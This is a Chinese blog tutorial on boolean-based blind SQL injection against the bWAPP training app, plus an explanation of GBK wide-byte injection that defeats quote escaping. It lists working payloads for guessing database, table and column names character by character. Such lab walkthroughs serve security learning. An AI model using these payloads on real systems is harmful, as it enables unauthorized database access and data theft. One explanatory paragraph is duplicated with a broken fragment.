bWAPP-SQLiBlind

最新推荐文章于 2023-01-23 15:08:12 发布
最新推荐文章于 2023-01-23 15:08:12 发布
阅读量195 收藏 2
点赞数
分类专栏: bWAPP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/108815212
版权

布尔盲注

基本流程

1.判断注入点

'
' or 1=1#
' or 1=2#

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2.判断数据库长度并逐个爆破(count/length/mid)

  • 使用length()函数判断数据库长度(二分法)
-- 前面放回false 执行or 后面的语句如果返回true则数据库长度大于该值,反之小于
' or length(database()) >  8#
' or length(database()) >  4#
' or length(database()) >  6#

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

故数据库长度为5

' or length(database()) =  5#

在这里插入图片描述

  • 逐个字符爆破数据库名

    使用midsubstring截取字符并逐个判断

    --' or ascii(mid(database(),1,1))>110 #
' or ascii(substring(database(),1,1))>100 # (false)
' or ascii(substring(database(),1,1))>95 # (true)
' or ascii(substring(database(),1,1))>97 # (true)
' or ascii(substring(database(),1,1))>99 # (flase)
' or ascii(substring(database(),1,1))= 98 # (true)

在这里插入图片描述

98对应为字符 b

ascii码对照

在这里插入图片描述

以此类推得到表名

爆破表的个数/长度/表名(count/length/mid)

  • 爆破表的个数
or (select count(table_name) from information_schema.tables where table_schema=database())>5 #
  • 爆破表的长度
' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) > 5 #
  • 爆破字符
' or ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 100 #

爆破列个数/长度/列名(count/length/mid)

  • 爆破列的个数
' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users') > 5 #
  • 爆破列的长度
' or length((select column_name from information_schema.columns where 
 table_schema=database() and table_name='users' limit 0,1)) > 5 #
  • 爆破列名
' or ascii(mid((select column_name from information_schema.columns where 
 table_schema=database() and table_name='users' limit 0,1),1,1)) > 105 #

base

low

直接注入,可使用sqlmap进行注入

mid/high

采用了addslashed()和mysqli_real_escape_string()函数,

且mysql编码和os编码一致, 无法用宽字节绕过,

宽字节注入

注入原理

注入原理很简单, 就是编码, 一点一点分析:

假设一个url有注入, 但是有安全函数, 我们敲单引号会被过滤,那么怎么办呢?这时候就利用GBK双字节注入

我们在后边这么构造url一个尝试:

http://www.****.com/index.php?id=1%df' and 1=1

其中,

%df ’ 经过安全函数之后在 ’ 之前会被加上一个转义符号’’, 即: %df '

由于采用的是url编码, 最后转化为:

%df%5c%27

关键就在这,%df会吃掉%5c,形成一个新的字节, 形象一点就是%df遇到%5c会把%5c吃掉,形成%df%5c,这个编码经过代码

解码后会形成一个汉字“誠”

还不明白? 没关系, 举一个简单的栗子:

xi’an (西安) ==> xian(先)

值得一提的是, 并不是唯一的使用%df, 只要编码超过ascii码(128)之后, 可以自己组合。只要是汉字就都可以使用

总的来解释一下,

因为%df的关系,\的编码%5c被吃掉了,也就失去了转义的效果,即安全函数丧失了作用, 被直接带入到mysql中,然后mysql在解读时无视了%df%5c形成的新字节,那么单引号便重新发挥了效果, 就可以构造注入了。

以自己组合。只要是汉字就都可以使用**

总的来解释一下,

因为%df的关系,\的编码%5c被吃掉了,也就失去了转义的效果,即安全函数丧失了作用, 被直接带入到mysql中,然后mysql在解读时无视了%df%5c形成的新字节,那么单引号便重新发挥了效果, 就可以构造注入了。

宽字节注入

hee_mee
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bWAPP-SQLIBlind2
hee_mee的博客
09-26 114
zeronil
mysql 布尔型盲注_Mysql 高级盲注之布尔型盲注【sqli blind】
weixin_36381298的博客
02-07 246
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔型盲注做详细说明,关于其它的技巧,后续还会再单...
mysql bool盲注_Mysql 高级盲注之布尔型盲注【sqli blind】
weixin_39971132的博客
01-18 173
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔型盲注做详细说明,关于其它的技巧,后续还会再单...
sqli blind injection盲注,以马冬梅为例
小雨的博客
08-16 138
sqli 盲注 intruder burp
SQL Injection (Blind)_low
qq_45434762的博客
10-10 265
1.判断注入类型 http://192.168.126.147/DVWA-master/vulnerabilities/sqli_blind/?id=1 --+&Submit=Submit# 显示存在 http://192.168.126.147/DVWA-master/vulnerabilities/sqli_blind/?id=a --+&Submit=Submi...
bWAPP漏洞测试环境.rar
04-06
bWAPP,全称为"Black Box Web Application Penetration Testing Framework",是一款用于安全专业人士和学生进行Web应用漏洞测试的开源工具。它包含了多种常见的Web安全漏洞示例,旨在帮助用户了解并学习如何发现和...
bwapp官方最新版本
03-20
【bwapp官方最新版本】是网络安全领域的一款著名应用,它是一个用于教育和测试目的的漏洞应用平台。bwapp,全称BlackWidow Application Penetration Testing Platform,旨在帮助网络安全专业人员、开发人员以及学生...
bWAPP源码docker安装.zip
08-12
bwapp源码,下载该源码,然后通过docker在本地进行安装,也可以直接在网上拉取镜像。bwapp源码,下载该源码,然后通过docker在本地进行安装,也可以直接在网上拉取镜像。
mysql布尔对应哪一个_Mysql 高级盲注之布尔型盲注【Sqli Blind】
weixin_39537977的博客
12-05 103
文章来源于:lsh4ck's Blog什么是盲注[sqli blind]盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的 union 曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布...
渗透测试平台bwapp简单介绍及安装
weixin_30379973的博客
09-14 796
先来介绍一下bwapp bwapp是一款非常好用的漏洞演示平台,包含有100多个漏洞 SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP, PHP Code, Host Header and SMTP injections Authentication, authorization and session manageme...
bWApp SQL 注入
Yanug
09-26 1182
1.可以显示的字段 1' union select 1,2,3,4,5,6,7# 2.对mysql用户名主机名,当前数据库的版本信息,当前数据库名称,数据库路径等进行查询和显示。 1' union select 1,user(),version(),database(),5,6,7# 3.当前数据库下面的表名: 1' union select 1,table_name,table_sche...
3.bWAPP SQL注入篇
最新发布
吾所在处,即为净土
01-23 2895
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
bWAPP SQL注入篇
angry_program的博客
03-03 6909
步骤 下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数 (order by ) 3.确定显示的字段顺序 4.获取当前数据库 (爆库) 5.获取数据库中的表 (爆表) 6.获取表中的字段名 (爆字段) 7.下载数据 (爆数据) 0x01SQL Injection (GET/Search) ...
SQL Injection-Blind-Time-Based(bWAPP)注入思路
****的博客
08-23 1341
靶机:bWAPP bug:SQL Injection-Blind-Time-Based 难度等级:low 分析 无论输入什么字符串,都会返回“The result will be sent by e-mail...”。因此首先要确定该处是否存在注入。因此这里可以参考基于时间的注入方法。本文使用主要使用if(exp1,exp2,exp3)及sleep函数,根据网络的延迟去判断是否发生注入。 ...
bWAPP搭建以及数据库文件bwapp.sqlite不能自动建立数据库的问题
qq_41403219的博客
07-07 1679
bWAPP安装包下载:https://sourceforge.net/projects/bwapp/ 在已经安装好lamp环境的虚拟机上,将bWAPP安装包解压后放在/var/www/html目录下,更改配置文件/bWAPP/admin/下的settings.php文件,如图: 访问一下:https://172.17.8.123/bWAPP/bWAPP/install.php https://IP地址/html下的bWAPP文件夹/bWAPP/install.php 点击安装bWAPP: 安装成功: 点击
bWAPP通关记录(A1)
qq_39670065的博客
08-16 1364
安装 这里使用的是phpstudy进行搭建的 先下载bWAPP 打开解压之后bWAPP目录下的admin中的settings.php 将数据库连接名和密码改为与phpmyadmin相同的,保存 浏览器访问 点击here 点击Login,默认密码bee/bug A1 - InjectionHTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL )H
BWAPP:一款非常好用的漏洞演示平台
公众号shadow sock7
06-14 5160
参考: http://www.freebuf.com/sectool/76885.html https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
bWAPP V2.2:入门教程:搭建与准备虚拟机
bWAPP V2.2 是一款专注于漏洞演示的工具,专为网络安全教育和渗透测试设计,提供了一个集成了各种安全测试环境的平台。它允许用户在虚拟环境中进行实战演练,学习并发现Web应用程序中的漏洞,从而提升安全意识和技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值